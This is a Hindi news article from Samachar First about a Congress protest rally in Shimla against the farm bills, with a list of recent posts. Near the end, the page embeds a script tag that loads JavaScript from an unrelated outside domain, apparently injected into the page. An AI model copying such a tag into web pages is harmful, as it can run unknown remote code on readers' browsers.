Categories: हिमाचल

कृषि बिल के खिलाफ शिमला में कांग्रेस का प्रदर्शन, बिल के खिलाफ राज्यपाल को सौंपा ज्ञापन

<p>कृषि बिल के खिलाफ पूरे देश मे हो रहे विरोध प्रदर्शन के बीच राष्ट्रपति रामनाथ कोविंद ने संसद से पास हुए तीनों बिलों पर हस्ताक्षर कर दिये हैं। अब तीनों कृषि बिल कानून बन गये हैं। राष्ट्रपति के हस्ताक्षर के बाद अब केंद्र सरकार कभी भी अधिसूचना जारी कर सकती है। कृषि बिलों का विरोध देश के कई हिस्सों में हो रहा है। शिमला में भी कांग्रेस ने आज इस बिल के खिलाफ विरोध प्रदर्शन किया और रिज पर महात्मा गांधी की प्रतिमा से राजभवन तक रैली निकाली और राज्यपाल को ज्ञापन सौंपा।</p>

<p>कांग्रेस प्रदेश अध्यक्ष कुलदीप राठौर ने कहा कि इस बिल के खिलाफ किसान पूरे देश मे सड़कों पर है। निरकुंश सरकार के इस अध्यादेश पर राष्ट्रपति ने भी हस्ताक्षर कर दिए हैं, जिससे किसानों का भविष्य खतरे में है। देश जब आजाद हुआ था तब देश मे अन्न बाहर से आयात किया जाता था। कांग्रेस की नीतियों के कारण 1965 में एपीएमसी एक्ट के तहत मंडिया बनाई गई। जिससे किसान आत्मनिर्भर बना और हम देश से बाहर भी अन्न के निर्यात करने लगे। लेकिन अब सरकार ने इस बिल से मंडियों और न्यूनतम समर्थन मूल्य को खत्म कर दिया है। आज इस काले कानून को लेकर सरकार किसानों के हित पूंजीपतियों को बेच रही है।</p>

<p>उन्होंने कहा कि आज देश की सरकार अम्बानी, अडानी ओर रिलायंस चला रही है। सभी सार्वजनिक उपक्रमों को निजी हाथों में बेचा जा रहा है जिसका कांग्रेस विरोध करती है। इस बिल के खिलाफ 2 अक्टूबर को पूरे देश मे ब्लॉक स्तर पर विरोध प्रदर्शन किये जायेंगे और 10 को किसानों का सम्मेलन किया जाएगा। जिससे सरकार को इस काले कानून को वापिस लेने के लिए मजबूर किया जाएगा।</p>

<p><img src=”/media/gallery/images/image(1269).png” style=”height:110px; width:900px” /></p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>

Samachar First

Recent Posts

चंडीगढ़ सेक्टर 42 कॉलेज में हिमाचल की बेटी ने प्रेरणा ने मारी बाजी

चंडीगढ़ सेक्टर-42 के गवर्नमेंट पीजी गर्ल्स कॉलेज में चल रही चुनाव में हिमाचल प्रदेश के…

16 hours ago

संजौली मस्जिद विवाद को लेकर एमसी आयुक्त के कोर्ट में सुनवाई

सबंधित जेई और वक्फ बोर्ड को लगी फटकार, मामले की 5 अक्टूबर को अगली सुनवाई,जेई…

16 hours ago

इंस्पायर मानक अवार्ड के लिए 15 सितंबर तक छात्र करवा सकते है आवेदन

हमीरपुर, कांगड़ा व चंबा के छात्र लेंगे भाग अभी तक कई स्कूलों ने नहीं किया…

16 hours ago

निबंध लेखन में रितिका ने हासिल किया पहला स्थान

भाषा-संस्कृति विभाग जिला कांगडा़ द्वारा जिला स्तरीय राजभाषा हिन्दीं पखवाडे का आयोजन जी.ए.वी स्कूल कांगडा…

17 hours ago

परशुराम चौक बाजार में जलभराव की समस्या से मिली निजात, व्यापारी खुश

पांवटा साहिब- शहर में जल भराव की समस्या से निपटने के लिए नगर निगम द्वारा…

17 hours ago

राज्य में खेल गतिविधियों को बढ़ावा देने के लिए प्रदेश सरकार प्रतिबद्धः केवल पठानिया

धर्मशाला, 6 सितम्बर: उपमुख्य सचेतक व विधायक शाहपुर केवल सिंह पठानिया ने आज शाहपुर विधानसभा…

1 day ago